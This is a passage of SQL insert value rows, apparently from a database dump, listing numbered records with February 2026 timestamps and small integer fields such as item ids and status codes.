(26549, '2026-02-19 16:28:16', 1, 2062, 0, 1, 1),
(26550, '2026-02-19 16:28:46', 1, 2062, 0, 1, 1),
(26551, '2026-02-19 16:31:37', 1, 2060, 0, 1, 1),
(26552, '2026-02-19 16:31:40', 1, 2060, 0, 1, 1),
(26553, '2026-02-19 17:33:28', 1, 2063, 0, 1, 1),
(26554, '2026-02-19 19:59:50', 1, 2062, 0, 1, 1),
(26555, '2026-02-19 20:00:47', 1, 2053, 0, 1, 1),
(26556, '2026-02-19 22:43:26', 1, 2053, 0, 1, 1),
(26557, '2026-02-19 23:29:50', 1, 2061, 0, 1, 1),
(26558, '2026-02-19 23:31:38', 1, 2060, 0, 1, 1),
(26559, '2026-02-20 00:27:47', 1, 2060, 0, 1, 1),
(26560, '2026-02-20 03:38:30', 1, 2061, 0, 1, 1),
(26561, '2026-02-20 05:07:46', 1, 2053, 0, 1, 1),
(26562, '2026-02-20 05:52:10', 1, 2053, 0, 1, 1),
(26563, '2026-02-20 06:36:39', 1, 2054, 0, 1, 1),
(26564, '2026-02-20 06:36:39', 1, 2058, 0, 1, 1),
(26565, '2026-02-20 06:38:54', 1, 2055, 0, 1, 1),
(26566, '2026-02-20 06:40:09', 1, 2060, 0, 1, 1),
(26567, '2026-02-20 06:40:11', 1, 2060, 0, 1, 1),
(26568, '2026-02-20 06:58:18', 1, 2059, 0, 1, 1),
(26569, '2026-02-20 08:16:19', 1, 2053, 0, 1, 1),
(26570, '2026-02-20 08:40:12', 1, 2053, 0, 1, 1),
(26571, '2026-02-20 08:40:18', 1, 2058, 0, 1, 1),
(26572, '2026-02-20 11:42:35', 1, 2055, 0, 1, 1),
(26573, '2026-02-20 13:00:14', 1, 2060, 0, 1, 1),
(26574, '2026-02-20 13:54:38', 1, 2060, 0, 1, 1),
(26575, '2026-02-20 14:08:54', 1, 2061, 0, 1, 1),
(26576, '2026-02-20 14:26:30', 1, 2053, 0, 1, 1),
(26577, '2026-02-20 16:23:57', 1, 2053, 0, 1, 1),
(26578, '2026-02-20 16:39:45', 1, 2062, 0, 1, 1),
(26579, '2026-02-20 16:40:17', 1, 2062, 0, 1, 1),
(26580, '2026-02-20 17:04:07', 1, 2060, 0, 1, 1),
(26581, '2026-02-20 17:04:09', 1, 2064, 0, 1, 1),
(26582, '2026-02-20 17:04:11', 1, 2063, 0, 1, 1),
(26583, '2026-02-20 17:04:13', 1, 2058, 0, 1, 1),
(26584, '2026-02-20 17:04:14', 1, 2061, 0, 1, 1),
(26585, '2026-02-20 17:04:15', 1, 2059, 0, 1, 1),
(26586, '2026-02-20 17:04:17', 1, 2062, 0, 1, 1),
(26587, '2026-02-20 17:04:18', 1, 2054, 0, 1, 1),
(26588, '2026-02-20 17:04:21', 1, 2055, 0, 1, 1),
(26589, '2026-02-20 18:31:56', 1, 2061, 0, 1, 1),
(26590, '2026-02-20 18:50:32', 1, 2064, 0, 1, 1),
(26591, '2026-02-20 20:00:47', 1, 2053, 0, 1, 1),
(26592, '2026-02-20 21:18:00', 1, 2059, 0, 1, 1),
(26593, '2026-02-20 21:18:27', 1, 2061, 0, 1, 1),
(26594, '2026-02-20 21:34:41', 1, 2064, 0, 1, 1),
(26595, '2026-02-20 21:41:59', 1, 2054, 0, 1, 1),
(26596, '2026-02-20 22:37:25', 1, 2061, 0, 1, 1),
(26597, '2026-02-20 22:45:50', 1, 2062, 0, 1, 1),
(26598, '2026-02-20 22:45:58', 1, 2061, 0, 1, 1),
(26599, '2026-02-20 22:46:03', 1, 2063, 0, 1, 1),
(26600, '2026-02-21 00:40:11', 1, 2061, 0, 1, 1),
(26601, '2026-02-21 01:24:49', 1, 2063, 0, 1, 1),
(26602, '2026-02-21 01:45:34', 1, 2064, 0, 1, 1),
(26603, '2026-02-21 02:00:05', 1, 2060, 0, 1, 1),
(26604, '2026-02-21 02:09:51', 1, 2053, 0, 1, 1),
(26605, '2026-02-21 02:15:24', 1, 2063, 0, 1, 1),
(26606, '2026-02-21 02:36:46', 1, 2058, 0, 1, 1),
(26607, '2026-02-21 02:36:47', 1, 2055, 0, 1, 1),
(26608, '2026-02-21 02:36:48', 1, 2058, 0, 1, 1),
(26609, '2026-02-21 02:36:51', 1, 2060, 0, 1, 1),
(26610, '2026-02-21 02:37:36', 1, 2060, 0, 1, 1),
(26611, '2026-02-21 02:42:28', 1, 2054, 0, 1, 1),
(26612, '2026-02-21 06:49:28', 1, 2060, 0, 1, 1),
(26613, '2026-02-21 06:49:33', 1, 2059, 0, 1, 1),
(26614, '2026-02-21 06:56:00', 1, 2061, 0, 1, 1),
(26615, '2026-02-21 07:20:40', 1, 2053, 0, 1, 1),
(26616, '2026-02-21 07:49:59', 1, 2060, 0, 1, 1),
(26617, '2026-02-21 09:24:27', 1, 2058, 0, 1, 1),
(26618, '2026-02-21 10:46:24', 1, 2061, 0, 1, 1),
(26619, '2026-02-21 12:03:21', 1, 2053, 0, 1, 1),
(26620, '2026-02-21 12:37:46', 1, 2062, 0, 1, 1),
(26621, '2026-02-21 12:53:48', 1, 2060, 0, 1, 1),
(26622, '2026-02-21 14:04:25', 1, 2053, 0, 1, 1),
(26623, '2026-02-21 16:42:18', 1, 2062, 0, 1, 1),
(26624, '2026-02-21 16:43:14', 1, 2062, 0, 1, 1),
(26625, '2026-02-21 17:12:01', 1, 2061, 0, 1, 1),
(26626, '2026-02-21 18:29:40', 1, 2060, 0, 1, 1),
(26627, '2026-02-21 19:42:24', 1, 2058, 0, 1, 1),
(26628, '2026-02-21 20:06:25', 1, 2064, 0, 1, 1),
(26629, '2026-02-21 20:33:37', 1, 2059, 0, 1, 1),
(26630, '2026-02-21 21:06:23', 1, 2060, 0, 1, 1),
(26631, '2026-02-21 21:06:26', 1, 2060, 0, 1, 1),
(26632, '2026-02-21 21:37:19', 1, 2060, 0, 1, 1),
(26633, '2026-02-21 21:37:22', 1, 2060, 0, 1, 1),
(26634, '2026-02-21 22:33:33', 1, 2053, 0, 1, 1),
(26635, '2026-02-21 22:37:04', 1, 2060, 0, 1, 1),
(26636, '2026-02-21 22:39:25', 1, 2058, 0, 1, 1),
(26637, '2026-02-21 22:39:39', 1, 2055, 0, 1, 1),
(26638, '2026-02-21 22:40:46', 1, 2060, 0, 1, 1),
(26639, '2026-02-21 22:40:53', 1, 2062, 0, 1, 1),
(26640, '2026-02-22 00:14:52', 1, 2061, 0, 1, 1),
(26641, '2026-02-22 00:47:15', 1, 2053, 0, 1, 1),
(26642, '2026-02-22 00:52:06', 1, 2060, 0, 1, 1),
(26643, '2026-02-22 03:21:58', 1, 2060, 0, 1, 1),
(26644, '2026-02-22 03:42:53', 1, 2055, 0, 1, 1),
(26645, '2026-02-22 03:53:11', 1, 2054, 0, 1, 1),
(26646, '2026-02-22 04:02:59', 1, 2061, 0, 1, 1),
(26647, '2026-02-22 04:13:00', 1, 2058, 0, 1, 1),
(26648, '2026-02-22 04:52:19', 1, 2054, 0, 1, 1),
(26649, '2026-02-22 07:57:40', 1, 2061, 0, 1, 1),
(26650, '2026-02-22 08:33:37', 1, 2060, 0, 1, 1),
(26651, '2026-02-22 08:44:55', 1, 2053, 0, 1, 1),
(26652, '2026-02-22 09:52:51', 1, 2062, 0, 1, 1),
(26653, '2026-02-22 10:18:00', 1, 2062, 0, 1, 1),
(26654, '2026-02-22 12:23:13', 1, 2061, 0, 1, 1),
(26655, '2026-02-22 13:49:50', 1, 2055, 0, 1, 1),
(26656, '2026-02-22 13:49:53', 1, 2063, 0, 1, 1),
(26657, '2026-02-22 13:49:56', 1, 2062, 0, 1, 1),
(26658, '2026-02-22 13:49:59', 1, 2060, 0, 1, 1),
(26659, '2026-02-22 14:22:25', 1, 2064, 7001, 1, 1),
(26660, '2026-02-22 14:28:27', 1, 2060, 0, 1, 1),
(26661, '2026-02-22 16:05:46', 1, 2061, 0, 1, 1),
(26662, '2026-02-22 16:26:32', 1, 2062, 0, 1, 1),
(26663, '2026-02-22 16:27:19', 1, 2062, 0, 1, 1),
(26664, '2026-02-22 16:49:03', 1, 2063, 0, 1, 1),
(26665, '2026-02-22 18:31:27', 1, 2064, 0, 1, 1),
(26666, '2026-02-22 18:38:00', 1, 2060, 0, 1, 1),
(26667, '2026-02-22 18:38:02', 1, 2061, 0, 1, 1),
(26668, '2026-02-22 18:39:16', 1, 2060, 0, 1, 1),
(26669, '2026-02-22 18:44:03', 1, 2054, 0, 1, 1),
(26670, '2026-02-22 18:46:29', 1, 2058, 0, 1, 1),
(26671, '2026-02-22 18:49:03', 1, 2055, 0, 1, 1),
(26672, '2026-02-22 19:04:21', 1, 2063, 0, 1, 1),
(26673, '2026-02-22 20:12:05', 1, 2053, 0, 1, 1),
(26674, '2026-02-22 20:49:43', 1, 2058, 0, 1, 1),
(26675, '2026-02-22 20:50:30', 1, 2061, 0, 1, 1),
(26676, '2026-02-22 20:51:15', 1, 2059, 0, 1, 1),
(26677, '2026-02-22 20:51:58', 1, 2060, 0, 1, 1),
(26678, '2026-02-22 20:52:44', 1, 2062, 0, 1, 1),
(26679, '2026-02-22 20:53:31', 1, 2063, 0, 1, 1),
(26680, '2026-02-22 20:54:16', 1, 2064, 0, 1, 1),
(26681, '2026-02-22 21:01:10', 1, 2055, 0, 1, 1),
(26682, '2026-02-22 21:01:54', 1, 2054, 0, 1, 1),
(26683, '2026-02-22 21:02:40', 1, 2053, 0, 1, 1),
(26684, '2026-02-23 00:54:23', 1, 2053, 0, 1, 1),
(26685, '2026-02-23 01:12:39', 1, 2055, 0, 1, 1),
(26686, '2026-02-23 01:17:09', 1, 2060, 0, 1, 1),
(26687, '2026-02-23 01:19:06', 1, 2064, 0, 1, 1),
(26688, '2026-02-23 01:19:44', 1, 2063, 0, 1, 1),
(26689, '2026-02-23 01:20:21', 1, 2062, 0, 1, 1),
(26690, '2026-02-23 01:20:59', 1, 2060, 0, 1, 1),
(26691, '2026-02-23 01:21:38', 1, 2059, 0, 1, 1),
(26692, '2026-02-23 01:22:18', 1, 2061, 0, 1, 1),
(26693, '2026-02-23 01:22:55', 1, 2058, 0, 1, 1),
(26694, '2026-02-23 02:13:13', 1, 2053, 0, 1, 1),
(26695, '2026-02-23 02:13:51', 1, 2054, 0, 1, 1),
(26696, '2026-02-23 03:34:03', 1, 2060, 0, 1, 1),
(26697, '2026-02-23 05:18:18', 1, 2060, 0, 1, 1),
(26698, '2026-02-23 06:02:18', 1, 2055, 0, 1, 1),
(26699, '2026-02-23 06:02:23', 1, 2063, 0, 1, 1),
(26700, '2026-02-23 06:02:27', 1, 2062, 0, 1, 1),
(26701, '2026-02-23 06:02:30', 1, 2060, 0, 1, 1),
(26702, '2026-02-23 06:18:46', 1, 2053, 0, 1, 1),
(26703, '2026-02-23 06:36:06', 1, 2061, 0, 1, 1),
(26704, '2026-02-23 07:11:02', 1, 2060, 0, 1, 1),
(26705, '2026-02-23 10:32:15', 1, 2053, 0, 1, 1),
(26706, '2026-02-23 10:54:53', 1, 2061, 0, 1, 1),
(26707, '2026-02-23 14:38:42', 1, 2060, 0, 1, 1),
(26708, '2026-02-23 14:40:36', 1, 2055, 0, 1, 1),
(26709, '2026-02-23 14:41:19', 1, 2058, 0, 1, 1),
(26710, '2026-02-23 14:42:04', 1, 2060, 0, 1, 1),
(26711, '2026-02-23 14:43:01', 1, 2054, 0, 1, 1),
(26712, '2026-02-23 14:47:52', 1, 2063, 0, 1, 1),
(26713, '2026-02-23 16:00:36', 1, 2060, 0, 1, 1),
(26714, '2026-02-23 16:28:32', 1, 2053, 0, 1, 1),
(26715, '2026-02-23 16:52:08', 1, 2062, 0, 1, 1),
(26716, '2026-02-23 16:52:25', 1, 2062, 0, 1, 1),
(26717, '2026-02-23 18:01:01', 1, 2061, 0, 1, 1),
(26718, '2026-02-23 18:56:52', 1, 2061, 0, 1, 1),
(26719, '2026-02-23 19:13:09', 1, 2053, 0, 1, 1),
(26720, '2026-02-23 19:42:02', 1, 2054, 0, 1, 1),
(26721, '2026-02-23 19:42:06', 1, 2058, 0, 1, 1),
(26722, '2026-02-23 20:12:59', 1, 2061, 0, 1, 1),
(26723, '2026-02-23 20:18:19', 1, 2060, 0, 1, 1),
(26724, '2026-02-23 20:47:21', 1, 2064, 0, 1, 1),
(26725, '2026-02-23 20:48:06', 1, 2058, 0, 1, 1),
(26726, '2026-02-23 21:39:26', 1, 2060, 0, 1, 1),
(26727, '2026-02-23 21:39:28', 1, 2060, 0, 1, 1),
(26728, '2026-02-23 22:08:11', 1, 2060, 0, 1, 1),
(26729, '2026-02-23 22:08:14', 1, 2060, 0, 1, 1),
(26730, '2026-02-24 00:38:21', 1, 2054, 0, 1, 1),
(26731, '2026-02-24 01:17:44', 1, 2062, 0, 1, 1),
(26732, '2026-02-24 05:09:56', 1, 2061, 0, 1, 1),
(26733, '2026-02-24 05:20:42', 1, 2061, 0, 1, 1),
(26734, '2026-02-24 05:54:18', 1, 2060, 0, 1, 1),
(26735, '2026-02-24 06:12:50', 1, 2060, 0, 1, 1),
(26736, '2026-02-24 06:18:10', 1, 2061, 0, 1, 1),
(26737, '2026-02-24 06:35:53', 1, 2053, 0, 1, 1),
(26738, '2026-02-24 08:18:04', 1, 2060, 0, 1, 1),
(26739, '2026-02-24 08:56:39', 1, 2053, 0, 1, 1),
(26740, '2026-02-24 10:18:15', 1, 2059, 0, 1, 1),
(26741, '2026-02-24 13:50:42', 1, 2060, 0, 1, 1),
(26742, '2026-02-24 14:16:42', 1, 2060, 0, 1, 1),
(26743, '2026-02-24 14:17:03', 1, 2058, 0, 1, 1),
(26744, '2026-02-24 14:17:59', 1, 2055, 0, 1, 1),
(26745, '2026-02-24 14:18:45', 1, 2054, 0, 1, 1),
(26746, '2026-02-24 14:20:17', 1, 2063, 0, 1, 1),
(26747, '2026-02-24 14:21:25', 1, 2060, 0, 1, 1),
(26748, '2026-02-24 14:47:52', 1, 2063, 0, 1, 1),
(26749, '2026-02-24 15:13:21', 1, 2063, 0, 1, 1),
(26750, '2026-02-24 15:38:53', 1, 2053, 0, 1, 1),
(26751, '2026-02-24 16:24:22', 1, 2062, 0, 1, 1),
(26752, '2026-02-24 16:25:18', 1, 2062, 0, 1, 1),
(26753, '2026-02-24 18:39:46', 1, 2062, 0, 1, 1),
(26754, '2026-02-24 18:46:10', 1, 2060, 0, 1, 1),
(26755, '2026-02-24 19:06:08', 1, 2061, 0, 1, 1),
(26756, '2026-02-24 19:14:35', 1, 2055, 0, 1, 1),
(26757, '2026-02-24 19:48:31', 1, 2064, 0, 1, 1),
(26758, '2026-02-24 20:44:16', 1, 2064, 0, 1, 1),
(26759, '2026-02-24 21:06:27', 1, 2060, 0, 1, 1),
(26760, '2026-02-24 21:12:55', 1, 2061, 0, 1, 1),
(26761, '2026-02-24 21:25:57', 1, 2053, 0, 1, 1),
(26762, '2026-02-24 21:33:18', 1, 2061, 0, 1, 1),
(26763, '2026-02-25 02:54:39', 1, 2063, 0, 1, 1),
(26764, '2026-02-25 03:10:56', 1, 2059, 0, 1, 1),
(26765, '2026-02-25 03:25:44', 1, 2063, 0, 1, 1),
(26766, '2026-02-25 03:28:29', 1, 2061, 0, 1, 1),
(26767, '2026-02-25 03:43:28', 1, 2054, 0, 1, 1),
(26768, '2026-02-25 04:12:00', 1, 2060, 0, 1, 1),
(26769, '2026-02-25 04:34:44', 1, 2064, 0, 1, 1),
(26770, '2026-02-25 04:35:52', 1, 2058, 0, 1, 1),
(26771, '2026-02-25 05:21:42', 1, 2058, 0, 1, 1),
(26772, '2026-02-25 06:32:52', 1, 2053, 0, 1, 1),
(26773, '2026-02-25 06:47:21', 1, 2062, 0, 1, 1),
(26774, '2026-02-25 10:01:35', 1, 2061, 0, 1, 1),
(26775, '2026-02-25 11:58:40', 1, 2063, 0, 1, 1),
(26776, '2026-02-25 13:46:45', 1, 2064, 0, 1, 1),
(26777, '2026-02-25 14:16:22', 1, 2058, 0, 1, 1),
(26778, '2026-02-25 14:16:24', 1, 2054, 0, 1, 1),
(26779, '2026-02-25 14:17:28', 1, 2055, 0, 1, 1),
(26780, '2026-02-25 14:18:13', 1, 2060, 0, 1, 1),
(26781, '2026-02-25 14:19:43', 1, 2060, 0, 1, 1),
(26782, '2026-02-25 14:20:18', 1, 2061, 0, 1, 1),
(26783, '2026-02-25 14:42:45', 1, 2061, 0, 1, 1),
(26784, '2026-02-25 14:47:52', 1, 2063, 0, 1, 1),
(26785, '2026-02-25 15:26:45', 1, 2053, 0, 1, 1),
(26786, '2026-02-25 16:58:58', 1, 2062, 0, 1, 1),
(26787, '2026-02-25 16:59:27', 1, 2062, 0, 1, 1),
(26788, '2026-02-25 16:59:33', 1, 2063, 0, 1, 1),
(26789, '2026-02-25 17:25:13', 1, 2053, 0, 1, 1),
(26790, '2026-02-25 17:49:17', 1, 2060, 0, 1, 1),
(26791, '2026-02-25 17:51:27', 1, 2059, 0, 1, 1),
(26792, '2026-02-25 18:20:34', 1, 2055, 0, 1, 1),
(26793, '2026-02-25 18:33:35', 1, 2060, 0, 1, 1),
(26794, '2026-02-25 19:00:18', 1, 2060, 0, 1, 1),
(26795, '2026-02-25 19:08:59', 1, 2060, 0, 1, 1),
(26796, '2026-02-25 19:09:02', 1, 2060, 0, 1, 1),
(26797, '2026-02-25 19:10:08', 1, 2060, 0, 1, 1),
(26798, '2026-02-25 19:23:49', 1, 2060, 0, 1, 1),
(26799, '2026-02-25 19:24:32', 1, 2059, 0, 1, 1),
(26800, '2026-02-25 19:26:25', 1, 2061, 0, 1, 1),
(26801, '2026-02-25 19:43:48', 1, 2060, 0, 1, 1),
(26802, '2026-02-25 19:43:50', 1, 2060, 0, 1, 1),
(26803, '2026-02-25 19:50:55', 1, 2060, 0, 1, 1),
(26804, '2026-02-25 22:51:42', 1, 2058, 0, 1, 1),
(26805, '2026-02-25 22:52:21', 1, 2062, 0, 1, 1),
(26806, '2026-02-25 23:02:18', 1, 2054, 0, 1, 1),
(26807, '2026-02-25 23:10:24', 1, 2064, 0, 1, 1),
(26808, '2026-02-26 00:39:16', 1, 2059, 0, 1, 1),
(26809, '2026-02-26 00:51:08', 1, 2060, 0, 1, 1),
(26810, '2026-02-26 01:17:06', 1, 2064, 0, 1, 1),
(26811, '2026-02-26 02:34:36', 1, 2053, 0, 1, 1),
(26812, '2026-02-26 03:16:55', 4, 2054, 7071, 1, 1),
(26813, '2026-02-26 03:16:57', 4, 2055, 7071, 1, 1),
(26814, '2026-02-26 03:16:59', 4, 2063, 7071, 1, 1),
(26815, '2026-02-26 03:17:01', 4, 2062, 7071, 1, 1),
(26816, '2026-02-26 03:17:03', 4, 2060, 7071, 1, 1),
(26817, '2026-02-26 03:17:05', 4, 2059, 7071, 1, 1),
(26818, '2026-02-26 03:17:07', 4, 2058, 7071, 1, 1),
(26819, '2026-02-26 03:17:11', 4, 2061, 7071, 1, 1),
(26820, '2026-02-26 03:17:15', 4, 2064, 7071, 1, 1),
(26821, '2026-02-26 03:17:29', 4, 2053, 7071, 1, 1),
(26822, '2026-02-26 03:36:28', 1, 2061, 0, 1, 1),
(26823, '2026-02-26 03:40:52', 1, 2053, 0, 1, 1),
(26824, '2026-02-26 04:01:05', 1, 2058, 0, 1, 1),
(26825, '2026-02-26 04:18:50', 1, 2060, 0, 1, 1),
(26826, '2026-02-26 05:01:14', 1, 2064, 0, 1, 1),
(26827, '2026-02-26 05:18:23', 1, 2061, 0, 1, 1),
(26828, '2026-02-26 07:39:40', 1, 2054, 0, 1, 1),
(26829, '2026-02-26 07:42:51', 1, 2058, 0, 1, 1),
(26830, '2026-02-26 09:45:23', 1, 2061, 0, 1, 1),
(26831, '2026-02-26 09:51:24', 1, 2053, 0, 1, 1),
(26832, '2026-02-26 10:00:35', 1, 2059, 0, 1, 1),
(26833, '2026-02-26 11:08:00', 1, 2060, 0, 1, 1),
(26834, '2026-02-26 12:02:14', 1, 2059, 0, 1, 1),
(26835, '2026-02-26 12:25:12', 1, 2064, 0, 1, 1),
(26836, '2026-02-26 12:25:12', 1, 2064, 0, 1, 1),
(26837, '2026-02-26 12:25:12', 1, 2064, 0, 1, 1),
(26838, '2026-02-26 12:25:15', 1, 2064, 0, 1, 1),
(26839, '2026-02-26 12:25:15', 1, 2064, 0, 1, 1),
(26840, '2026-02-26 12:25:16', 1, 2064, 0, 1, 1),
(26841, '2026-02-26 12:25:18', 1, 2064, 0, 1, 1),
(26842, '2026-02-26 12:25:18', 1, 2064, 0, 1, 1),
(26843, '2026-02-26 12:25:18', 1, 2064, 0, 1, 1),
(26844, '2026-02-26 12:25:20', 1, 2064, 0, 1, 1),
(26845, '2026-02-26 12:25:20', 1, 2064, 0, 1, 1),
(26846, '2026-02-26 12:25:21', 1, 2064, 0, 1, 1),
(26847, '2026-02-26 12:25:23', 1, 2064, 0, 1, 1),
(26848, '2026-02-26 12:25:23', 1, 2064, 0, 1, 1),
(26849, '2026-02-26 12:25:23', 1, 2064, 0, 1, 1),
(26850, '2026-02-26 12:25:25', 1, 2063, 0, 1, 1),
(26851, '2026-02-26 12:25:25', 1, 2062, 0, 1, 1),
(26852, '2026-02-26 12:25:25', 1, 2064, 0, 1, 1),
(26853, '2026-02-26 12:25:25', 1, 2064, 0, 1, 1),
(26854, '2026-02-26 12:25:26', 1, 2064, 0, 1, 1),
(26855, '2026-02-26 12:25:27', 1, 2061, 0, 1, 1),
(26856, '2026-02-26 12:25:28', 1, 2059, 0, 1, 1),
(26857, '2026-02-26 12:25:28', 1, 2055, 0, 1, 1),
(26858, '2026-02-26 12:25:28', 1, 2058, 0, 1, 1),
(26859, '2026-02-26 12:25:28', 1, 2060, 0, 1, 1),
(26860, '2026-02-26 12:25:28', 1, 2054, 0, 1, 1),
(26861, '2026-02-26 12:25:31', 1, 2061, 0, 1, 1),
(26862, '2026-02-26 12:25:31', 1, 2060, 0, 1, 1),
(26863, '2026-02-26 12:25:31', 1, 2055, 0, 1, 1),
(26864, '2026-02-26 12:25:31', 1, 2058, 0, 1, 1),
(26865, '2026-02-26 12:25:31', 1, 2059, 0, 1, 1),
(26866, '2026-02-26 12:25:32', 1, 2054, 0, 1, 1),
(26867, '2026-02-26 12:25:33', 1, 2061, 0, 1, 1),
(26868, '2026-02-26 12:25:33', 1, 2060, 0, 1, 1),
(26869, '2026-02-26 12:25:34', 1, 2058, 0, 1, 1),
(26870, '2026-02-26 12:25:34', 1, 2059, 0, 1, 1),
(26871, '2026-02-26 12:25:34', 1, 2055, 0, 1, 1),
(26872, '2026-02-26 12:25:34', 1, 2054, 0, 1, 1),
(26873, '2026-02-26 12:25:36', 1, 2059, 0, 1, 1),
(26874, '2026-02-26 12:25:36', 1, 2060, 0, 1, 1),
(26875, '2026-02-26 12:25:36', 1, 2061, 0, 1, 1),
(26876, '2026-02-26 12:25:36', 1, 2058, 0, 1, 1),
(26877, '2026-02-26 12:25:36', 1, 2055, 0, 1, 1),
(26878, '2026-02-26 12:25:37', 1, 2054, 0, 1, 1),
(26879, '2026-02-26 12:25:37', 1, 2061, 0, 1, 1),
(26880, '2026-02-26 12:25:38', 1, 2060, 0, 1, 1),
(26881, '2026-02-26 12:25:38', 1, 2055, 0, 1, 1),
(26882, '2026-02-26 12:25:38', 1, 2058, 0, 1, 1),
(26883, '2026-02-26 12:25:38', 1, 2059, 0, 1, 1),
(26884, '2026-02-26 12:25:39', 1, 2054, 0, 1, 1),
(26885, '2026-02-26 12:25:40', 1, 2061, 0, 1, 1),
(26886, '2026-02-26 12:25:40', 1, 2060, 0, 1, 1),
(26887, '2026-02-26 12:25:40', 1, 2058, 0, 1, 1),
(26888, '2026-02-26 12:25:40', 1, 2059, 0, 1, 1),
(26889, '2026-02-26 12:25:40', 1, 2055, 0, 1, 1),
(26890, '2026-02-26 12:25:41', 1, 2054, 0, 1, 1),
(26891, '2026-02-26 12:29:27', 1, 2062, 0, 1, 1),
(26892, '2026-02-26 12:29:27', 1, 2064, 0, 1, 1),
(26893, '2026-02-26 12:29:27', 1, 2063, 0, 1, 1),
(26894, '2026-02-26 12:29:27', 1, 2064, 0, 1, 1),
(26895, '2026-02-26 12:29:27', 1, 2064, 0, 1, 1),
(26896, '2026-02-26 12:29:27', 1, 2061, 0, 1, 1),
(26897, '2026-02-26 12:29:28', 1, 2060, 0, 1, 1),
(26898, '2026-02-26 12:29:29', 1, 2059, 0, 1, 1),
(26899, '2026-02-26 12:29:29', 1, 2058, 0, 1, 1),
(26900, '2026-02-26 12:29:30', 1, 2055, 0, 1, 1),
(26901, '2026-02-26 12:29:30', 1, 2054, 0, 1, 1),
(26902, '2026-02-26 12:29:34', 1, 2054, 0, 1, 1),
(26903, '2026-02-26 12:29:35', 1, 2055, 0, 1, 1),
(26904, '2026-02-26 12:29:35', 1, 2054, 0, 1, 1),
(26905, '2026-02-26 14:15:51', 1, 2060, 0, 1, 1),
(26906, '2026-02-26 14:16:59', 1, 2059, 0, 1, 1),
(26907, '2026-02-26 14:17:03', 1, 2054, 0, 1, 1),
(26908, '2026-02-26 14:17:28', 1, 2059, 0, 1, 1),
(26909, '2026-02-26 14:18:27', 1, 2060, 0, 1, 1),
(26910, '2026-02-26 14:19:17', 1, 2055, 0, 1, 1),
(26911, '2026-02-26 14:19:55', 1, 2058, 0, 1, 1),
(26912, '2026-02-26 14:47:52', 1, 2063, 0, 1, 1),
(26913, '2026-02-26 15:31:16', 1, 2061, 0, 1, 1),
(26914, '2026-02-26 16:56:57', 1, 2062, 0, 1, 1),
(26915, '2026-02-26 16:57:20', 1, 2062, 0, 1, 1),
(26916, '2026-02-26 18:26:07', 1, 2053, 0, 1, 1),
(26917, '2026-02-26 21:56:05', 1, 2061, 0, 1, 1),
(26918, '2026-02-26 23:39:14', 1, 2060, 0, 1, 1),
(26919, '2026-02-26 23:56:33', 1, 2053, 0, 1, 1),
(26920, '2026-02-27 00:51:25', 1, 2060, 0, 1, 1),
(26921, '2026-02-27 01:08:37', 1, 2061, 0, 1, 1),
(26922, '2026-02-27 03:29:16', 1, 2064, 0, 1, 1),
(26923, '2026-02-27 05:14:22', 1, 2054, 0, 1, 1),
(26924, '2026-02-27 05:14:26', 1, 2054, 0, 1, 1),
(26925, '2026-02-27 05:27:45', 1, 2061, 0, 1, 1),
(26926, '2026-02-27 05:43:46', 1, 2060, 0, 1, 1),
(26927, '2026-02-27 06:06:27', 1, 2064, 7096, 1, 1),
(26928, '2026-02-27 06:06:31', 1, 2064, 7096, 1, 1),
(26929, '2026-02-27 07:22:53', 1, 2064, 0, 1, 1),
(26930, '2026-02-27 07:22:54', 1, 2064, 0, 1, 1),
(26931, '2026-02-27 07:22:54', 1, 2064, 0, 1, 1),
(26932, '2026-02-27 07:22:54', 1, 2062, 0, 1, 1),
(26933, '2026-02-27 07:22:54', 1, 2063, 0, 1, 1),
(26934, '2026-02-27 07:22:54', 1, 2061, 0, 1, 1),
(26935, '2026-02-27 07:22:54', 1, 2060, 0, 1, 1),
(26936, '2026-02-27 07:22:56', 1, 2059, 0, 1, 1),
(26937, '2026-02-27 07:22:56', 1, 2058, 0, 1, 1),
(26938, '2026-02-27 07:22:57', 1, 2055, 0, 1, 1),
(26939, '2026-02-27 07:22:58', 1, 2063, 0, 1, 1),
(26940, '2026-02-27 07:22:58', 1, 2054, 0, 1, 1),
(26941, '2026-02-27 07:22:59', 1, 2063, 0, 1, 1),
(26942, '2026-02-27 07:22:59', 1, 2059, 0, 1, 1),
(26943, '2026-02-27 07:22:59', 1, 2058, 0, 1, 1),
(26944, '2026-02-27 07:23:00', 1, 2055, 0, 1, 1),
(26945, '2026-02-27 07:23:00', 1, 2054, 0, 1, 1),
(26946, '2026-02-27 07:23:01', 1, 2059, 0, 1, 1),
(26947, '2026-02-27 07:23:01', 1, 2055, 0, 1, 1),
(26948, '2026-02-27 07:23:01', 1, 2058, 0, 1, 1),
(26949, '2026-02-27 07:23:02', 1, 2054, 0, 1, 1),
(26950, '2026-02-27 07:24:45', 1, 2064, 0, 1, 1),
(26951, '2026-02-27 07:24:45', 1, 2061, 0, 1, 1),
(26952, '2026-02-27 07:24:45', 1, 2064, 0, 1, 1),
(26953, '2026-02-27 07:24:45', 1, 2064, 0, 1, 1),
(26954, '2026-02-27 07:24:45', 1, 2063, 0, 1, 1),
(26955, '2026-02-27 07:24:45', 1, 2062, 0, 1, 1),
(26956, '2026-02-27 07:24:46', 1, 2060, 0, 1, 1),
(26957, '2026-02-27 07:24:46', 1, 2059, 0, 1, 1),
(26958, '2026-02-27 07:24:46', 1, 2058, 0, 1, 1),
(26959, '2026-02-27 07:24:47', 1, 2055, 0, 1, 1),
(26960, '2026-02-27 07:24:48', 1, 2054, 0, 1, 1),
(26961, '2026-02-27 08:50:03', 1, 2053, 0, 1, 1),
(26962, '2026-02-27 08:50:12', 1, 2058, 0, 1, 1),
(26963, '2026-02-27 11:05:40', 1, 2063, 0, 1, 1),
(26964, '2026-02-27 11:44:32', 1, 2055, 0, 1, 1),
(26965, '2026-02-27 13:13:10', 1, 2053, 0, 1, 1),
(26966, '2026-02-27 14:17:01', 1, 2060, 0, 1, 1),
(26967, '2026-02-27 14:19:00', 1, 2055, 0, 1, 1),
(26968, '2026-02-27 14:19:18', 1, 2058, 0, 1, 1),
(26969, '2026-02-27 14:20:05', 1, 2054, 0, 1, 1),
(26970, '2026-02-27 14:21:28', 1, 2060, 0, 1, 1),
(26971, '2026-02-27 15:43:54', 1, 2053, 0, 1, 1),
(26972, '2026-02-27 17:02:20', 1, 2062, 0, 1, 1),
(26973, '2026-02-27 17:03:16', 1, 2062, 0, 1, 1),
(26974, '2026-02-27 18:32:14', 1, 2060, 0, 1, 1),
(26975, '2026-02-27 18:32:18', 1, 2060, 0, 1, 1),
(26976, '2026-02-27 20:19:54', 1, 2058, 0, 1, 1),
